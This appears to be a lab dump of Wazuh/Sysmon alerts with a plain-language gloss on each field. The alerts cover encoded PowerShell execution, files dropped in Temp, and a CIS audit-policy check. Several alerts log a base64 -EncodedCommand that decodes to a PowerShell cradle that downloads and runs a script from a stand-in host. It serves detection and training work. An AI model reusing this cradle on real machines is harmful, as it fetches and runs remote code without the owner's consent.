data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd97-680a-a20b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13412 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 92 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534369.1842322 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:26.6347400Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285300 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:26.599
ProcessGuid: {94294ddc-bd9c-680a-a40b-000000000e00}
ProcessId: 12304
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_kkk1op4e.muk.ps1
CreationUtcTime: 2025-04-24 22:39:26.599
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:26.599 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd9c-680a-a40b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_kkk1op4e.muk.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:26.599 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 89 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534372.1845091 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:30.0574559Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285327 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:28.089
ProcessGuid: {94294ddc-bda0-680a-a60b-000000000e00}
ProcessId: 15520
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd9c-680a-a40b-000000000e00}
ParentProcessId: 12304
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:28.089 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bda0-680a-a60b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd9c-680a-a40b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 93 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534372.1853162 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:30.2971724Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285328 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:30.274
ProcessGuid: {94294ddc-bda0-680a-a60b-000000000e00}
ProcessId: 15520
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ulxacboz.arb.ps1
CreationUtcTime: 2025-04-24 22:39:30.274
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:30.274 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bda0-680a-a60b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ulxacboz.arb.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:30.274 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.4'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534375.1855931 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26160 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Removable Storage' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to audit user attempts to access file system objects on a removable storage device. A security audit event is generated only for all objects for all types of access requested. If you configure this policy setting, an audit event is generated each time an account accesses a file system object on a removable storage. Success audits record successful attempts and Failure audits record unsuccessful attempts. If you do not configure this policy setting, no audit event is generated when an account accesses a file system object on a removable storage. The recommended state for this setting is: Success and Failure. Note: A Windows 8.0, Server 2012 (non-R2) or newer OS is required to access and set this value in Group Policy. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing removable storage may be useful when investigating an incident. For example, if an individual is suspected of copying sensitive information onto a USB drive. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Removable Storage Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Removable Storage"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"Removable Storage"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 90 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534375.1859856 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:33.0039060Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285351 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:31.869
ProcessGuid: {94294ddc-bda3-680a-a80b-000000000e00}
ProcessId: 6888
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bda0-680a-a60b-000000000e00}
ParentProcessId: 15520
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:31.869 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bda3-680a-a80b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
